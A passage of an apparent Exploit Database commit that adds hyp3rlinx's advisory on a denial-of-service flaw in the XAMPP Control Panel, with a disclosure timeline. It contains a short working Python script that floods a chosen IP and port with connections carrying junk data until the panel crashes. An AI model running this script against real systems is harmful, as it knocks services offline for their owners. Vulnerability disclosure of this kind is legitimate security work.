DB: 2016-12-26
1 new exploits XAMPP Control Panel - Denial Of Service
This commit is contained in:
Offensive Security
parent
560fb055c7
commit
af66bcd9e5
2 changed files with 150 additions and 0 deletions
|
|
@ -5329,6 +5329,7 @@ id,file,description,date,author,platform,type,port
|
|||
40955,platforms/multiple/dos/40955.txt,"macOS < 10.12.2 / iOS < 10.2 Kernel - ipc_port_t Reference Count Leak Due to Incorrect externalMethod Overrides Use-After-Free",2016-12-22,"Google Security Research",multiple,dos,0
|
||||
40958,platforms/multiple/dos/40958.c,"macOS 10.12.1 / iOS < 10.2 - powerd Arbitrary Port Replacement",2016-12-22,"Google Security Research",multiple,dos,0
|
||||
40959,platforms/multiple/dos/40959.c,"macOS 10.12.1 / iOS < 10.2 - syslogd Arbitrary Port Replacement",2016-12-22,"Google Security Research",multiple,dos,0
|
||||
40964,platforms/windows/dos/40964.py,"XAMPP Control Panel - Denial Of Service",2016-12-25,hyp3rlinx,windows,dos,0
|
||||
3,platforms/linux/local/3.c,"Linux Kernel 2.2.x / 2.4.x (RedHat) - 'ptrace/kmod' Privilege Escalation",2003-03-30,"Wojciech Purczynski",linux,local,0
|
||||
4,platforms/solaris/local/4.c,"Sun SUNWlldap Library Hostname - Buffer Overflow",2003-04-01,Andi,solaris,local,0
|
||||
12,platforms/linux/local/12.c,"Linux Kernel < 2.4.20 - Module Loader Privilege Escalation",2003-04-14,KuRaK,linux,local,0
|
||||
|
|
|
|||
|
Can't render this file because it is too large.
|
149
platforms/windows/dos/40964.py
Executable file
149
platforms/windows/dos/40964.py
Executable file
|
|
@ -0,0 +1,149 @@
|
|||
'''
|
||||
[+] Credits: John Page (hyp3rlinx)
|
||||
|
||||
[+] Website: hyp3rlinx.altervista.org
|
||||
|
||||
[+] Source:
|
||||
http://hyp3rlinx.altervista.org/advisories/XAMPP-CONTROL-PANEL-MEMORY-CORRUPTION-DOS.txt
|
||||
|
||||
[+] ISR: ApparitionSec
|
||||
|
||||
|
||||
|
||||
Vendor:
|
||||
=====================
|
||||
www.apachefriends.org
|
||||
|
||||
|
||||
|
||||
|
||||
Product:
|
||||
===================
|
||||
XAMPP Control Panel
|
||||
|
||||
|
||||
XAMPP is a free and open source cross-platform web server solution stack
|
||||
package developed by Apache Friends,
|
||||
consisting mainly of the Apache HTTP Server, MariaDB database, and
|
||||
interpreters for scripts written in the PHP
|
||||
and Perl programming languages.
|
||||
|
||||
|
||||
|
||||
Vulnerability Type:
|
||||
=====================
|
||||
Memory Corruption DOS
|
||||
|
||||
|
||||
|
||||
CVE Reference:
|
||||
==============
|
||||
N/A
|
||||
|
||||
|
||||
|
||||
Vulnerability Details:
|
||||
=====================
|
||||
|
||||
XAMPP Control Panel crashes with access violation when writing junk bytes
|
||||
into several different ports e.g.
|
||||
|
||||
Tested following ports / versions:
|
||||
|
||||
(MySQL) 3306 v3.2.2
|
||||
(Tomcat) 8080 (XAMPP v3.1.0)
|
||||
(FileZilla) 21
|
||||
(Mercury Mail) 25 (XAMPP v3.1.0),79,105,106,143.
|
||||
|
||||
It is not that XAMPP Control Panel is listening on some port, however
|
||||
memory corruption and Denial Of Service does
|
||||
occur when you constantly write junk into, for instance, the MySQL, Tomcat,
|
||||
FileZilla, Mercury Mail listening ports.
|
||||
|
||||
|
||||
1) Launch XAMPP control panel
|
||||
2) Run exploit script against some ports like 3306, 79, 105 (Mercury mail)
|
||||
with Apache running and or Tomcat
|
||||
|
||||
Target different services and port combinations to reproduce.
|
||||
|
||||
Important to note is that neither MySQL or Apache itself crash, it IS the
|
||||
XAMPP Control Panel that crashes with Access Violation.
|
||||
|
||||
|
||||
Tested Windows SP1
|
||||
|
||||
|
||||
POC Video:
|
||||
https://vimeo.com/196938261
|
||||
|
||||
|
||||
Exploit code(s):
|
||||
===============
|
||||
'''
|
||||
|
||||
import socket
|
||||
|
||||
print "XAMPP Control Panel DOS"
|
||||
print "Discovery: John Page (hyp3rlinx)"
|
||||
print "ApparitionSec"
|
||||
print "hyp3rlinx.altervista.org\r\n"
|
||||
|
||||
IP = raw_input("[IP]> ")
|
||||
PORT = raw_input("[PORT]> ")
|
||||
|
||||
arr=[]
|
||||
c=0
|
||||
while 1:
|
||||
try:
|
||||
arr.append(socket.create_connection((IP,PORT)))
|
||||
arr[c].send("DOOM")
|
||||
print "Die!"
|
||||
c+=1
|
||||
except socket.error:
|
||||
print "[+] Done! "
|
||||
raw_input()
|
||||
break
|
||||
|
||||
|
||||
|
||||
'''
|
||||
Disclosure Timeline:
|
||||
=======================================
|
||||
Vendor Notification: November 1, 2016
|
||||
Vendor acknowledgement: November 4, 2016
|
||||
Vendor released Fix : December 22, 2016
|
||||
(NO public mention as of the time of this writing)
|
||||
December 24, 2016 : Public Disclosure
|
||||
|
||||
|
||||
|
||||
|
||||
Exploitation Technique:
|
||||
=======================
|
||||
Remote
|
||||
|
||||
|
||||
|
||||
Severity Level:
|
||||
================
|
||||
High
|
||||
|
||||
|
||||
|
||||
|
||||
[+] Disclaimer
|
||||
The information contained within this advisory is supplied "as-is" with no
|
||||
warranties or guarantees of fitness of use or otherwise.
|
||||
Permission is hereby granted for the redistribution of this advisory,
|
||||
provided that it is not altered except by reformatting it, and
|
||||
that due credit is given. Permission is explicitly given for insertion in
|
||||
vulnerability databases and similar, provided that due credit
|
||||
is given to the author. The author is not responsible for any misuse of the
|
||||
information contained herein and accepts no responsibility
|
||||
for any damage caused by the use or misuse of this information. The author
|
||||
prohibits any malicious use of security related information
|
||||
or exploits by the author or elsewhere.
|
||||
|
||||
hyp3rlinx
|
||||
'''
|
||||
Loading…
Add table
Reference in a new issue